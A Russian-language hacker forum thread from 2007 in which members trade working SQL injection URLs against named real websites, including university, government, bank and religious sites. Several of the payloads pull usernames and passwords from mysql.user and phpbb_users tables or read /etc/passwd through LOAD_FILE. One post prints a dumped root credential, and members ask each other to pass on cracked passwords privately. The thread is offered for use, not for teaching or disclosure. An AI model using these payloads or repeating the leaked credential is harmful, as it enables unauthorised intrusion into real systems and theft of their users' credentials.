SQL Инъекции

злюка · 24 Jan 2007

http://www.mmcc.ru/events.php?id=1+union+select+1,concat(user,char(58),password)+from+mysql.user/*

х.з почему пасс не выводится...может его нет))

http://www.mmcc.ru/events.php?id=1+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100))+from+mysql.user/*

Spyder · 25 Jan 2007

.EDU домены =)

http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
Click to expand...

http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10/*
Click to expand...

http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user/*
Click to expand...

Кто докопается до паролей и тд прошу писать в ПМ

х.з почему пасс не выводится...может его нет))
Click to expand...

бывает..

guest3297 · 25 Jan 2007

http://kuda.nordiz.ru/tovar.php?tovar_id=-1%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+from+phpbb_users/*

Spyder · 25 Jan 2007

http://www.ihrc.org.uk/show.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Click to expand...

____

Thanat0z · 25 Jan 2007

HTML:

http://www.formicarium.pl/open.php?p=artykuly&dzial=-1+UNION+SELECt+database(),2/*
http://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-1+UNION+SELECt+database(),USER(),version()/*
http://www.formicarium.pl/open.php?p=artykuly+union+select+1/*

Sn@k3 · 26 Jan 2007

http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,2,3,4,5/*
http://www.fcdynamo.ru/material.php?id=642'+union+select+1,2,3,4,5,6,7,8/*
http://vostokmedia.com/news.details.php?id=-2+or+1=1/*
http://www.pvd.gov.lv/index.php?id=-2+or+1=1/*
http://www.mpa.ru/cis/country.php?id=-1+union+select+database(),system_user(),version()/*
http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.etnosfera.ru/ecentr.php?id=-2+or+1=1/*

Sn@k3 · 26 Jan 2007

http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
было пять минут тока, во...

*D1VER · 27 Jan 2007

[53x]Shadow said:

На islam.ru

http://www.islam.ru/shop/index.php?cat=-1+union+select+0,email,password,0,0+from+users/*

выяснил таблицу и нужные столбцы, но что то с выводом никак, у кого получится стучитесь в личку дальше больше....
Click to expand...

http://www.islam.ru/shop/index.php?sample=771&good=98&cat=-1+union+select+1,2,3,4,concat(password,char(58),id,CHAR(194,206,210,32,194,219,194,206,196,33))+from+users+limit+0,1/*
Без пробелов!

*D1VER · 27 Jan 2007

http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
было пять минут тока, во...
Click to expand...

Я доделал...
http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,Pwd,name,5,email,7,8+from+users+limit+0,1/*

fRg · 27 Jan 2007

Spyder said:

.EDU домены =)

Кто докопается до паролей и тд прошу писать в ПМ

бывает..
Click to expand...

h..p://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,user(),6,version(),password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user/*

Spyder · 27 Jan 2007

http://www.machinima.com/films.php?id=-1+union+select+version()/*
http://www.enterpriseinnovation.net/news.php?id=-7+union+select+1,2,3,4,5,6,7/*
http://www.hispanicprwire.com/news.php?l=in&id=-9+union+select+1,2,3,convert(1+using+latin1),5,6,7,8,9/*
Click to expand...

не надо в 3 отдельных поста все это (m0nzt3r)

n0ne · 27 Jan 2007

Code:
http://www.m-study.ru/courses/descr/?news_id=-60+union+select+1111,22222,33333/*
смотрим топ, там вывод)

+toxa+ · 27 Jan 2007

http://www.sovrep.gov.by/index.php/.557.2923...0.0.0.html
Click to expand...

==

http://www.sovrep.gov.by/index.php/.557.2924-1...0.0.0.html
Click to expand...

*D1VER · 27 Jan 2007

http://websib.ru/new_detail.php?new_id=-1+union+select+1,password,user+from+mysql.user/*

злюка · 27 Jan 2007

http://www.museum.sakha.ru/forum.php?f=1+union+select+1,2,3,4,5,convert(versi on()+using+cp1251),concat(convert(password+using+c p1251),char(58),convert(user+using+cp1251)),8,9,10 +from+mysql.user/*

_http://ul-online.ru/modules/job/vacancy.php?id=7+union+select+1,concat(user,char(5 8),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23+from+mysql.user/*

вывод из БД root:JF5555o

_http://ul-online.ru/modules/job/vacancy.php?id=7+union+select+1,concat(user_id,cha r(58),username,char(58),user_password,char(58),use r_email),3,4,5,6,7,8,9,10,11,LOAD_FILE(char(47,101 ,116,99,47,112,97,115,115,119,100)),13,14,15,16,17 ,18,19,20,21,22,23+from+phpbb_users+limit+1,1/*

вывод инфы из форума...пасс админа расшифровать не удалось

Sn@k3 · 28 Jan 2007

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+0x536e406b333a206e75206f6368656e207370617420686f63686563612e2e2e,2/*
http://www.akihabaranews.com/en/news_details.php?id=-1+union+select+1,2,version(),4/*

на сон грядущий....

Парой бывает необходимо перевести "слово" в нужную кодировку, хоть то 16 бит, или char, то вот фича, там ещё полно кодировок:
http://snak3.h17.ru/tools/

InferNo23 · 28 Jan 2007

TbBank

Code:

http://www.tbbank.ge/ge_news.php?news_id=-1+union+select+1,2,3,4,5,6/*

Красноярский городской сайт

Code:

http://kgs.ru/news.shtml?title=-1+union+select+1,2,user(),version(),5,6/*

Game-Ost

Code:

http://www.game-ost.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7/*&action=view

Rucenturion

Code:

http://www.rucenturion.com/view_news.php?news_id=89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

Flirtanica

Code:

http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,2,3,4,5/*

OBDD

Code:

http://www.obdd.ru/news_one.php?news_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

Sp0ok · 28 Jan 2007

Code:
http://calculatoare.ido.ro/index.php?id=2+union+elect+1,id,user(),4,5,6,7,8,9,10,11+from+articles/*
_____________________________________________
Shake if you want-Run if you can't !

Sp0ok · 28 Jan 2007

Code:

http://colombia.indymedia.org/print.php?id=54766 +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 /*

____________________________________________

злюка · 28 Jan 2007

_http://www.kultura72.ru/guide.php?idlt=26&t_id=35%20union%20select%201,concat(username,char(58),user_password,char(58),char(58),user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20phpbb_users/*
но форум фуфло полное

SQL Инъекции

злюка Elder - Старейшина

Spyder Elder - Старейшина

guest3297 Banned

Spyder Elder - Старейшина

Thanat0z Негрин

Sn@k3 Elder - Старейшина

Sn@k3 Elder - Старейшина

D1VER Elder - Старейшина*

D1VER Elder - Старейшина*

fRg Active Member

Spyder Elder - Старейшина

n0ne Elder - Старейшина

+toxa+ Smack! SMACK!!!

D1VER Elder - Старейшина*

злюка Elder - Старейшина

Sn@k3 Elder - Старейшина

InferNo23 Elder - Старейшина

Sp0ok New Member

Sp0ok New Member

злюка Elder - Старейшина

Useful Searches

SQL Инъекции

злюка Elder - Старейшина

Spyder Elder - Старейшина

guest3297 Banned

Spyder Elder - Старейшина

Thanat0z Негрин

Sn@k3 Elder - Старейшина

Sn@k3 Elder - Старейшина

*D1VER Elder - Старейшина

*D1VER Elder - Старейшина

fRg Active Member

Spyder Elder - Старейшина

n0ne Elder - Старейшина

+toxa+ Smack! SMACK!!!

*D1VER Elder - Старейшина

злюка Elder - Старейшина

Sn@k3 Elder - Старейшина

InferNo23 Elder - Старейшина

Sp0ok New Member

Sp0ok New Member

злюка Elder - Старейшина

D1VER Elder - Старейшина*

D1VER Elder - Старейшина*

D1VER Elder - Старейшина*